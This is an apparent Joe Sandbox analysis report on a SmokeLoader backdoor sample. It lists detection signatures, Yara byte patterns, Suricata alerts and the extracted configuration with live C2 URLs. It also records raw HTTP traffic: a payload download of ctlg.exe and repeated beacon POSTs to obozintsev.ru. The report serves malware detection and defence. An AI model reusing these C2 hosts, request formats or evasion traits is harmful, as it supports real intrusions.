Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
3WaqgS34S7.exe

Overview

General Information

Sample name:3WaqgS34S7.exe
renamed because original name is a hash value
Original sample name:F99E6584C274E6814B81BE68C0F2EE47.exe
Analysis ID:1565628
MD5:f99e6584c274e6814b81be68c0f2ee47
SHA1:56c3838e6f68404b1309291639b3a300292a46b1
SHA256:8e430af53d8eb61a39239d6537b7e8a2b99efb0852f8814ce1a5ebd7ace53fd4
Tags:exeSocks5Systemzuser-abuse_ch
Infos:

Detection

SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected SmokeLoader
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Creates a thread in another existing process (thread injection)
Deletes itself after installation
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
PE file overlay found
Sigma detected: Execution of Suspicious File Type Extension
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • 3WaqgS34S7.exe (PID: 6516 cmdline: "C:\Users\user\Desktop\3WaqgS34S7.exe" MD5: F99E6584C274E6814B81BE68C0F2EE47)
    • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
      • 7E95.exe (PID: 5084 cmdline: C:\Users\user\AppData\Local\Temp\7E95.exe MD5: C56489FED27114B3EAD6D98FAD967C15)
  • vdhivcv (PID: 6764 cmdline: C:\Users\user\AppData\Roaming\vdhivcv MD5: F99E6584C274E6814B81BE68C0F2EE47)
  • wrhivcv (PID: 4048 cmdline: C:\Users\user\AppData\Roaming\wrhivcv MD5: C56489FED27114B3EAD6D98FAD967C15)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
SmokeLoaderThe SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader
{"Version": 2022, "C2 list": ["http://obozintsev.ru/tmp/index.php", "http://olovge.at/tmp/index.php", "http://nuxc.cc/tmp/index.php", "http://piratekings.online/tmp/index.php"]}
SourceRuleDescriptionAuthorStrings
00000007.00000003.2776796462.0000000000890000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
    00000005.00000002.1983365123.00000000009B0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
      00000005.00000002.1983365123.00000000009B0000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
      • 0x634:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
      00000005.00000002.1983346956.00000000009A0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
      • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
      00000007.00000002.2828263113.0000000000890000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
        Click to see the 14 entries
        SourceRuleDescriptionAuthorStrings
        7.3.7E95.exe.890000.0.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
          7.2.7E95.exe.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
            7.2.7E95.exe.880e67.1.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security

              System Summary

              barindex
              Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\vdhivcv, CommandLine: C:\Users\user\AppData\Roaming\vdhivcv, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\vdhivcv, NewProcessName: C:\Users\user\AppData\Roaming\vdhivcv, OriginalFileName: C:\Users\user\AppData\Roaming\vdhivcv, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\user\AppData\Roaming\vdhivcv, ProcessId: 6764, ProcessName: vdhivcv
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-30T11:11:50.241243+010020283713Unknown Traffic192.168.2.450064103.35.190.240443TCP
              2024-11-30T11:13:12.097931+010020283713Unknown Traffic192.168.2.44979123.145.40.181443TCP
              2024-11-30T11:13:44.395105+010020283713Unknown Traffic192.168.2.44987523.145.40.181443TCP
              2024-11-30T11:14:56.054784+010020283713Unknown Traffic192.168.2.449949207.246.75.248443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-30T11:12:26.661625+010020391031A Network Trojan was detected192.168.2.449736189.163.166.5280TCP
              2024-11-30T11:12:28.539115+010020391031A Network Trojan was detected192.168.2.449737189.163.166.5280TCP
              2024-11-30T11:12:30.464957+010020391031A Network Trojan was detected192.168.2.449738189.163.166.5280TCP
              2024-11-30T11:12:32.393771+010020391031A Network Trojan was detected192.168.2.449739189.163.166.5280TCP
              2024-11-30T11:12:34.315997+010020391031A Network Trojan was detected192.168.2.449740189.163.166.5280TCP
              2024-11-30T11:12:36.283892+010020391031A Network Trojan was detected192.168.2.449741189.163.166.5280TCP
              2024-11-30T11:12:38.493730+010020391031A Network Trojan was detected192.168.2.449742189.163.166.5280TCP
              2024-11-30T11:12:40.415342+010020391031A Network Trojan was detected192.168.2.449743189.163.166.5280TCP
              2024-11-30T11:12:42.336279+010020391031A Network Trojan was detected192.168.2.449744189.163.166.5280TCP
              2024-11-30T11:12:44.476603+010020391031A Network Trojan was detected192.168.2.449745189.163.166.5280TCP
              2024-11-30T11:12:46.397930+010020391031A Network Trojan was detected192.168.2.449746189.163.166.5280TCP
              2024-11-30T11:12:48.544489+010020391031A Network Trojan was detected192.168.2.449747189.163.166.5280TCP
              2024-11-30T11:12:50.425797+010020391031A Network Trojan was detected192.168.2.449748189.163.166.5280TCP
              2024-11-30T11:12:52.340198+010020391031A Network Trojan was detected192.168.2.449749189.163.166.5280TCP
              2024-11-30T11:12:54.211867+010020391031A Network Trojan was detected192.168.2.449750189.163.166.5280TCP
              2024-11-30T11:12:56.083759+010020391031A Network Trojan was detected192.168.2.449752189.163.166.5280TCP
              2024-11-30T11:12:57.964234+010020391031A Network Trojan was detected192.168.2.449754189.163.166.5280TCP
              2024-11-30T11:12:59.830749+010020391031A Network Trojan was detected192.168.2.449755189.163.166.5280TCP
              2024-11-30T11:13:01.802938+010020391031A Network Trojan was detected192.168.2.449761189.163.166.5280TCP
              2024-11-30T11:13:03.676363+010020391031A Network Trojan was detected192.168.2.449767189.163.166.5280TCP
              2024-11-30T11:13:05.644767+010020391031A Network Trojan was detected192.168.2.449773189.163.166.5280TCP
              2024-11-30T11:13:07.570894+010020391031A Network Trojan was detected192.168.2.449778189.163.166.5280TCP
              2024-11-30T11:13:09.507541+010020391031A Network Trojan was detected192.168.2.449780189.163.166.5280TCP
              2024-11-30T11:13:15.257748+010020391031A Network Trojan was detected192.168.2.449797189.163.166.5280TCP
              2024-11-30T11:13:17.454825+010020391031A Network Trojan was detected192.168.2.449803189.163.166.5280TCP
              2024-11-30T11:13:19.374519+010020391031A Network Trojan was detected192.168.2.449809189.163.166.5280TCP
              2024-11-30T11:13:21.288923+010020391031A Network Trojan was detected192.168.2.449815189.163.166.5280TCP
              2024-11-30T11:13:23.209112+010020391031A Network Trojan was detected192.168.2.449819189.163.166.5280TCP
              2024-11-30T11:13:25.128970+010020391031A Network Trojan was detected192.168.2.449823189.163.166.5280TCP
              2024-11-30T11:13:27.270542+010020391031A Network Trojan was detected192.168.2.449828189.163.166.5280TCP
              2024-11-30T11:13:29.204841+010020391031A Network Trojan was detected192.168.2.449834189.163.166.5280TCP
              2024-11-30T11:13:31.076893+010020391031A Network Trojan was detected192.168.2.449840189.163.166.5280TCP
              2024-11-30T11:13:33.046649+010020391031A Network Trojan was detected192.168.2.449842189.163.166.5280TCP
              2024-11-30T11:13:34.998162+010020391031A Network Trojan was detected192.168.2.449847189.163.166.5280TCP
              2024-11-30T11:13:36.925631+010020391031A Network Trojan was detected192.168.2.449853189.163.166.5280TCP
              2024-11-30T11:13:39.051723+010020391031A Network Trojan was detected192.168.2.449859189.163.166.5280TCP
              2024-11-30T11:13:41.033201+010020391031A Network Trojan was detected192.168.2.449865189.163.166.5280TCP
              2024-11-30T11:13:42.994728+010020391031A Network Trojan was detected192.168.2.449869189.163.166.5280TCP
              2024-11-30T11:13:47.602500+010020391031A Network Trojan was detected192.168.2.449881189.163.166.5280TCP
              2024-11-30T11:13:49.522920+010020391031A Network Trojan was detected192.168.2.449887189.163.166.5280TCP
              2024-11-30T11:13:51.429121+010020391031A Network Trojan was detected192.168.2.449890189.163.166.5280TCP
              2024-11-30T11:13:53.395941+010020391031A Network Trojan was detected192.168.2.449896189.163.166.5280TCP
              2024-11-30T11:13:55.345806+010020391031A Network Trojan was detected192.168.2.449902189.163.166.5280TCP
              2024-11-30T11:13:57.270618+010020391031A Network Trojan was detected192.168.2.449908189.163.166.5280TCP
              2024-11-30T11:13:59.357155+010020391031A Network Trojan was detected192.168.2.449912189.163.166.5280TCP
              2024-11-30T11:14:01.341053+010020391031A Network Trojan was detected192.168.2.449915189.163.166.5280TCP
              2024-11-30T11:14:03.218592+010020391031A Network Trojan was detected192.168.2.449921189.163.166.5280TCP
              2024-11-30T11:14:05.094798+010020391031A Network Trojan was detected192.168.2.449927189.163.166.5280TCP
              2024-11-30T11:14:07.246905+010020391031A Network Trojan was detected192.168.2.449932189.163.166.5280TCP
              2024-11-30T11:14:09.171651+010020391031A Network Trojan was detected192.168.2.449937189.163.166.5280TCP
              2024-11-30T11:14:11.136134+010020391031A Network Trojan was detected192.168.2.449941189.163.166.5280TCP
              2024-11-30T11:14:13.297021+010020391031A Network Trojan was detected192.168.2.449946189.163.166.5280TCP
              2024-11-30T11:14:15.211720+010020391031A Network Trojan was detected192.168.2.449953189.163.166.5280TCP
              2024-11-30T11:14:17.129851+010020391031A Network Trojan was detected192.168.2.449959189.163.166.5280TCP
              2024-11-30T11:15:29.907269+010020391031A Network Trojan was detected192.168.2.450061123.213.233.13180TCP
              2024-11-30T11:15:39.774346+010020391031A Network Trojan was detected192.168.2.450062123.213.233.13180TCP
              2024-11-30T11:15:50.872341+010020391031A Network Trojan was detected192.168.2.450065123.213.233.13180TCP
              2024-11-30T11:16:02.791232+010020391031A Network Trojan was detected192.168.2.450066123.213.233.13180TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: http://obozintsev.ru/tmp/index.phpAvira URL Cloud: Label: malware
              Source: 00000005.00000002.1983365123.00000000009B0000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://obozintsev.ru/tmp/index.php", "http://olovge.at/tmp/index.php", "http://nuxc.cc/tmp/index.php", "http://piratekings.online/tmp/index.php"]}
              Source: C:\Users\user\AppData\Local\Temp\7E95.exeReversingLabs: Detection: 55%
              Source: C:\Users\user\AppData\Roaming\vdhivcvReversingLabs: Detection: 63%
              Source: C:\Users\user\AppData\Roaming\wrhivcvReversingLabs: Detection: 55%
              Source: 3WaqgS34S7.exeReversingLabs: Detection: 63%
              Source: 3WaqgS34S7.exeVirustotal: Detection: 51%Perma Link
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: C:\Users\user\AppData\Local\Temp\7E95.exeJoe Sandbox ML: detected
              Source: C:\Users\user\AppData\Local\Temp\F8FA.exeJoe Sandbox ML: detected
              Source: C:\Users\user\AppData\Roaming\wrhivcvJoe Sandbox ML: detected
              Source: C:\Users\user\AppData\Roaming\vdhivcvJoe Sandbox ML: detected
              Source: 3WaqgS34S7.exeJoe Sandbox ML: detected
              Source: 3WaqgS34S7.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: C:\Users\user\Desktop\3WaqgS34S7.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
              Source: unknownHTTPS traffic detected: 23.145.40.181:443 -> 192.168.2.4:49791 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 23.145.40.181:443 -> 192.168.2.4:49875 version: TLS 1.2
              Source: C:\Users\user\AppData\Roaming\wrhivcvCode function: 8_2_0041D240 GetLogicalDriveStringsA,GetLogicalDriveStringsA,GetLastError,GetLastError,GetStringTypeExA,BuildCommDCBW,GetTimeFormatA,SetThreadAffinityMask,GetConsoleAliasExesLengthA,OpenWaitableTimerA,GetProcessHandleCount,GetLocaleInfoA,_calloc,_realloc,_malloc,_calloc,InterlockedCompareExchange,GetSystemWindowsDirectoryW,WriteConsoleA,GetModuleHandleA,SetThreadContext,FindAtomA,_memset,SetDefaultCommConfigW,GetConsoleAliasW,MoveFileW,ConnectNamedPipe,ReadConsoleOutputA,GetModuleFileNameA,OpenFileMappingA,LocalAlloc,InterlockedDecrement,GetSystemTime,QueryMemoryResourceNotification,InterlockedDecrement,GetSystemTime,WriteConsoleOutputCharacterA,WriteConsoleOutputCharacterA,GetMonitorInfoA,GetClassLongW,GetMonitorInfoA,GetClassLongW,8_2_0041D240

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49740 -> 189.163.166.52:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49767 -> 189.163.166.52:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49747 -> 189.163.166.52:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49737 -> 189.163.166.52:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49750 -> 189.163.166.52:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49745 -> 189.163.166.52:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49736 -> 189.163.166.52:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49755 -> 189.163.166.52:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49743 -> 189.163.166.52:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49742 -> 189.163.166.52:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49741 -> 189.163.166.52:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49744 -> 189.163.166.52:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49761 -> 189.163.166.52:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49754 -> 189.163.166.52:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49746 -> 189.163.166.52:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49778 -> 189.163.166.52:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49797 -> 189.163.166.52:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49823 -> 189.163.166.52:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49749 -> 189.163.166.52:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49780 -> 189.163.166.52:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49809 -> 189.163.166.52:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49752 -> 189.163.166.52:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49803 -> 189.163.166.52:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49847 -> 189.163.166.52:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49908 -> 189.163.166.52:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49896 -> 189.163.166.52:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49840 -> 189.163.166.52:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49842 -> 189.163.166.52:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49869 -> 189.163.166.52:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49890 -> 189.163.166.52:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49921 -> 189.163.166.52:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49739 -> 189.163.166.52:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49859 -> 189.163.166.52:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49834 -> 189.163.166.52:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49927 -> 189.163.166.52:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49912 -> 189.163.166.52:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49738 -> 189.163.166.52:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49773 -> 189.163.166.52:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49932 -> 189.163.166.52:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49959 -> 189.163.166.52:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49819 -> 189.163.166.52:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49937 -> 189.163.166.52:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49881 -> 189.163.166.52:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49941 -> 189.163.166.52:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49815 -> 189.163.166.52:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49853 -> 189.163.166.52:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49828 -> 189.163.166.52:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49902 -> 189.163.166.52:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49953 -> 189.163.166.52:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49748 -> 189.163.166.52:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49865 -> 189.163.166.52:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49887 -> 189.163.166.52:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49915 -> 189.163.166.52:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49946 -> 189.163.166.52:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50061 -> 123.213.233.131:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50065 -> 123.213.233.131:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50066 -> 123.213.233.131:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50062 -> 123.213.233.131:80
              Source: C:\Windows\explorer.exeNetwork Connect: 103.35.190.240 443Jump to behavior
              Source: C:\Windows\explorer.exeNetwork Connect: 207.246.75.248 443Jump to behavior
              Source: C:\Windows\explorer.exeNetwork Connect: 123.213.233.131 80Jump to behavior
              Source: C:\Windows\explorer.exeNetwork Connect: 23.145.40.181 443Jump to behavior
              Source: C:\Windows\explorer.exeNetwork Connect: 189.163.166.52 80Jump to behavior
              Source: Malware configuration extractorURLs: http://obozintsev.ru/tmp/index.php
              Source: Malware configuration extractorURLs: http://olovge.at/tmp/index.php
              Source: Malware configuration extractorURLs: http://nuxc.cc/tmp/index.php
              Source: Malware configuration extractorURLs: http://piratekings.online/tmp/index.php
              Source: Joe Sandbox ViewIP Address: 123.213.233.131 123.213.233.131
              Source: Joe Sandbox ViewASN Name: VECTANTARTERIANetworksCorporationJP VECTANTARTERIANetworksCorporationJP
              Source: Joe Sandbox ViewASN Name: SKB-ASSKBroadbandCoLtdKR SKB-ASSKBroadbandCoLtdKR
              Source: Joe Sandbox ViewASN Name: AS-CHOOPAUS AS-CHOOPAUS
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49791 -> 23.145.40.181:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49875 -> 23.145.40.181:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49949 -> 207.246.75.248:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50064 -> 103.35.190.240:443
              Source: global trafficHTTP traffic detected: GET /prog/ctlg.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: midginvineco.com
              Source: global trafficHTTP traffic detected: GET /prog/ctlg.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: midginvineco.com
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://klvjvwlocecf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 287Host: obozintsev.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://totrulptsxj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 335Host: obozintsev.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fkyftbqjpntne.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 203Host: obozintsev.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vwrmkfcdqeqnf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 345Host: obozintsev.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ybhmruutgjll.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 253Host: obozintsev.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://idmlsaxfuvndeti.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 160Host: obozintsev.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dqwcacyxyiufxcg.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 122Host: obozintsev.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vbibiexffybg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 126Host: obozintsev.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rcoksbrtpdmb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 169Host: obozintsev.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://limsldbbguqnsba.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 262Host: obozintsev.ru
